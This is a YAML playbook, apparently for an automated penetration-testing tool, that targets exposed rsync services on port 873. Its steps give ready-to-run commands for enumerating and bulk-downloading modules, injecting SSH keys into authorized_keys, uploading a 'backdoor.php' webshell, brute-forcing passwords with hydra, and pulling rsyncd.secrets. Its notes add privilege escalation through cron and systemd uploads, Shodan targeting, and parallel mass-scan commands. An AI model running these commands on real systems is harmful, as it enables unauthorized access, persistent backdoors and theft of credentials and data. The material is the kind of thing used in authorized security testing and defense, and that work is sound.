id: rsync_pentesting
name: Rsync Penetration Testing (Port 873)
description: Comprehensive Rsync enumeration, module listing, file download/upload, and SSH key injection based on HackTricks methodology
category: enumeration
risk_level: medium
batch_compatible: true

triggers:
  - id: trigger_rsync_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [873, 8730] }
      protocol: { "$in": ["rsync", "tcp"] }
    required_count: 1
    priority: 4
    description: Triggers when Rsync service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: rsync_banner_grab
    name: Rsync Banner Grabbing
    description: Connect and retrieve Rsync version banner
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nc
        platforms: [linux, macos, windows]
        command: "echo '@RSYNCD: 31.0' | nc -vn {host} {port}"
        preferred: true
        notes: "Banner grab to get Rsync version"
        requires_elevation: false

  - id: rsync_module_enumeration
    name: Rsync Module Enumeration
    description: List available Rsync modules (shared folders)
    order: 2
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV --script 'rsync-list-modules' -p {port} {host}"
        preferred: true
        notes: "Enumerate Rsync modules with nmap"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av --list-only rsync://{host}:{port}/"
        preferred: true
        notes: "List all available modules"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/rsync/modules_list; set RHOSTS {host}; set RPORT {port}; run; exit'"
        preferred: false
        notes: "Metasploit Rsync module enumeration"
        requires_elevation: false

  - id: rsync_module_listing
    name: Rsync Module Content Listing
    description: List files and directories within Rsync modules
    order: 3
    timeout_seconds: 120
    commands:
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av --list-only rsync://{host}:{port}/{module_name}/"
        preferred: true
        notes: "List contents of a specific module"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av --list-only rsync://{username}@{host}:{port}/{module_name}/"
        preferred: false
        notes: "List module contents with authentication"
        requires_elevation: false

  - id: rsync_file_download
    name: Rsync File Download
    description: Download files from accessible Rsync modules
    order: 4
    timeout_seconds: 600
    commands:
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av rsync://{host}:{port}/{module_name}/ ./rsync_download_{module_name}/"
        preferred: true
        notes: "Recursively download entire module (unauthenticated)"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av rsync://{username}@{host}:{port}/{module_name}/ ./rsync_download_{module_name}/"
        preferred: false
        notes: "Recursively download with authentication (will prompt for password)"
        requires_elevation: false

  - id: rsync_file_upload
    name: Rsync File Upload (SSH Key Injection)
    description: Upload files to writable Rsync modules (authorized_keys attack)
    order: 5
    timeout_seconds: 300
    commands:
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av ~/.ssh/id_rsa.pub rsync://{host}:{port}/{module_name}/.ssh/authorized_keys"
        preferred: true
        notes: "Upload SSH public key for authentication bypass"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av ./backdoor.php rsync://{host}:{port}/{module_name}/webroot/"
        preferred: false
        notes: "Upload webshell to web-accessible directory"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av {username}@{host}:{port}/{local_file} rsync://{module_name}/{remote_path}"
        preferred: false
        notes: "Upload with authentication (will prompt for password)"
        requires_elevation: false

  - id: rsync_brute_force
    name: Rsync Authentication Brute Force
    description: Brute force Rsync module passwords
    order: 6
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt rsync://{host}:{port}"
        preferred: true
        notes: "Rsync password brute forcing"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script rsync-brute --script-args userdb=users.txt,passdb=passwords.txt {host}"
        preferred: false
        notes: "Nmap Rsync brute force"
        requires_elevation: false

  - id: rsync_config_extraction
    name: Rsync Configuration File Extraction
    description: Extract rsyncd.conf and rsyncd.secrets files
    order: 7
    timeout_seconds: 120
    commands:
      - tool: bash
        platforms: [linux, macos]
        command: "find /etc -name 'rsyncd.conf' -o -name 'rsyncd.secrets' 2>/dev/null"
        preferred: true
        notes: "Locate Rsync configuration files (requires file system access)"
        requires_elevation: false
      - tool: rsync
        platforms: [linux, macos]
        command: "rsync -av rsync://{host}:{port}/{module_name}/etc/rsyncd.conf ./rsyncd.conf 2>/dev/null"
        preferred: false
        notes: "Attempt to download config file if exposed"
        requires_elevation: false

metadata:
  tools:
    - rsync
    - nmap
    - nc
    - metasploit
    - hydra
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
    - https://www.smeegesec.com/2016/12/pentesting-rsync.html
  techniques:
    - Module enumeration
    - Unauthenticated file download
    - SSH authorized_keys injection
    - Webshell upload to writable directories
    - Configuration file extraction
    - Password brute forcing
  batch_commands:
    enum_modules: "parallel -j 10 'rsync -av --list-only rsync://{}:873/' :::: {targets_file}"
    download_all: "parallel -j 5 'rsync -av rsync://{}:873/{module}/ ./rsync_{}_{module}/' :::: {targets_file}"
  notes: |
    Rsync is a file synchronization tool commonly found on Unix-like systems.

    DEFAULT CONFIGURATION:
    - Default port: 873/TCP
    - No authentication by default (some modules may require it)
    - Modules are like shares (directories exposed for sync)

    COMMON MISCONFIGURATIONS:
    - World-readable modules containing sensitive data
    - Writable modules allowing arbitrary file upload
    - Weak or no passwords on protected modules
    - Exposure of home directories with SSH keys

    MODULE STRUCTURE:
    - Modules are defined in /etc/rsyncd.conf
    - Each module has a path, permissions, and optional authentication
    - Hidden modules won't appear in listings but can be accessed if name is known

    ATTACK SCENARIOS:
    1. SSH Key Injection:
       - Find writable home directory module
       - Upload your SSH public key to ~/.ssh/authorized_keys
       - SSH to the server with your private key

    2. Webshell Upload:
       - Find writable web root directory
       - Upload PHP/ASP webshell
       - Access via web browser for RCE

    3. Sensitive Data Exfiltration:
       - Download /etc/, /home/, backup directories
       - Search for credentials, SSH keys, database dumps
       - Look for .git directories with source code

    AUTHENTICATION:
    - Rsync uses simple password authentication
    - Passwords stored in rsyncd.secrets file
    - Format: username:password
    - Easily brute-forced with weak passwords

    MANUAL CONNECTION:
    1. Banner exchange: @RSYNCD: 31.0 (version)
    2. Send module list request: #list
    3. Server responds with available modules
    4. If password required: @RSYNCD: AUTHREQD <challenge>

    PRIVILEGE ESCALATION:
    - If Rsync runs as root, writable modules = root access
    - Upload cron job, systemd service, or SSH keys
    - Modify system files in writable /etc/ module

    SHODAN QUERIES:
    - port:873

    POST-EXPLOITATION:
    - Check /etc/rsyncd.conf for all module definitions
    - Check /etc/rsyncd.secrets for all credentials
    - Look for backup modules with full system access
    - Search for commented-out modules that might still be accessible
